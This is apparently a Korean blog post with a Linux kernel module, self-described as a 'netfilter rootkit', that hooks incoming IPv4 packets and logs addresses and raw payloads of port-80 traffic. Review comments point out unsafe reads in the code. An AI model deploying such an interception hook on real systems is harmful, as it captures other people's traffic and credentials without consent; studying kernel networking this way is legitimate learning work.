sk_buff에서 IP와 port 같은 내용을 추출할 수 있어서, 간단하게 테스트해보니 되었다.
이러한 방식으로 데이터를 스니핑 할 수 있을 것 같다.
물론 정교하게 만들어야겠지만...
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/sched.h>
#include <linux/mm.h>
#include <linux/highmem.h>
#include <linux/skbuff.h>
#include <linux/in.h>
#include <linux/icmp.h>
#include <linux/ip.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
#include <linux/tcp.h> /*tcp_hdr*/
/*
 * Expands a 32-bit address lvalue into its four bytes, in memory order,
 * for use with a "%d.%d.%d.%d" format string.  The argument is taken by
 * address, so it must be an lvalue (e.g. iph->saddr), not an expression.
 */
#define NIPQUAD(addr) \
((unsigned char *)&addr)[0], \
((unsigned char *)&addr)[1], \
((unsigned char *)&addr)[2], \
((unsigned char *)&addr)[3]
/* Forward declarations: module entry/exit points and the netfilter hook callback. */
int rootkit_init(void);
void rootkit_exit(void);
module_init(rootkit_init);
module_exit(rootkit_exit);
unsigned int sniff(void *priv, struct sk_buff *skb, const struct nf_hook_state *state);
/* The single hook registration filled in by rootkit_init() and torn down by rootkit_exit(). */
struct nf_hook_ops net_hook;
/*
 * Module entry point: fills in net_hook and registers it with netfilter
 * at NF_INET_PRE_ROUTING for PF_INET with NF_IP_PRI_FIRST priority, so
 * sniff() is invoked for incoming IPv4 packets.
 *
 * @return 1.  NOTE(review): the module_init convention is 0 on success and
 *         a negative errno on failure; a positive value is outside that
 *         convention — confirm what the loader does with it on the target
 *         kernel.  The return value of nf_register_hook() is also not
 *         checked, so a failed registration leaves the module loaded
 *         without any hook installed.
 */
int rootkit_init(void) {
printk("Network Sniffing\n");
/* Hook parameters: pre-routing chain, highest priority, IPv4, callback sniff(). */
net_hook.hooknum = NF_INET_PRE_ROUTING;
net_hook.priority = NF_IP_PRI_FIRST;
net_hook.pf = PF_INET;
net_hook.hook = &sniff;
nf_register_hook(&net_hook);
return 1;
}
/*
 * Netfilter hook callback (registered by rootkit_init at NF_INET_PRE_ROUTING).
 * For packets whose IP protocol field is 6 (IPPROTO_TCP) and whose TCP
 * source or destination port is 80, logs the IPv4 source/destination
 * addresses and prints the bytes following the TCP header as a C string.
 * Every packet is returned with NF_ACCEPT, so the hook never changes
 * forwarding; its only effect is kernel log output.
 *
 * @param priv   hook private data (unused here)
 * @param skb    the packet under inspection
 * @param state  hook state (unused here)
 * @return NF_ACCEPT for every packet
 *
 * NOTE(review): htcp->doff is read below before iph->protocol is checked,
 * so the "TCP header" is dereferenced for every packet, including non-TCP
 * ones; nothing here confirms that the IP and TCP headers are present in
 * the linear part of skb either.
 */
unsigned int sniff(void *priv, struct sk_buff *skb, const struct nf_hook_state *state){
struct iphdr* iph = ip_hdr(skb);
struct tcphdr* htcp = tcp_hdr(skb);
/* doff is the TCP header length in 32-bit words, hence *4 for bytes. */
int tcp_size = htcp->doff *4;
char* tcp_data = NULL;
/*tcp protocol check: 6 == IPPROTO_TCP*/
if(iph->protocol == 6){
/*web port filter: port fields are in network byte order, hence ntohs()*/
if(ntohs(htcp->source) == 80 ||
ntohs(htcp->dest) ==80){
printk("tcp protocol\n");
/* NIPQUAD reads the bytes in memory order, so the network-order address prints in the usual dotted form. */
printk(KERN_DEBUG "src address: %d.%d.%d.%d\n",NIPQUAD(iph->saddr));
printk(KERN_DEBUG "dst address: %d.%d.%d.%d\n",NIPQUAD(iph->daddr));
/* Payload starts right after the TCP header, including any options. */
tcp_data = (char*)((unsigned char*)htcp + tcp_size);
/* NOTE(review): "%s" scans until a NUL byte and nothing here bounds the
 * scan by the TCP payload length, so this can read past the end of the
 * packet data; a binary payload printed this way is also not meaningful. */
printk("data\n%s\n",tcp_data);
}
}
return NF_ACCEPT;
}
/* Module exit point: removes the hook that rootkit_init() registered. */
void rootkit_exit(void)
{
	nf_unregister_hook(&net_hook);
}
/* Module metadata as reported by modinfo. */
MODULE_DESCRIPTION ("netfilter rootkit");
MODULE_LICENSE("GPL");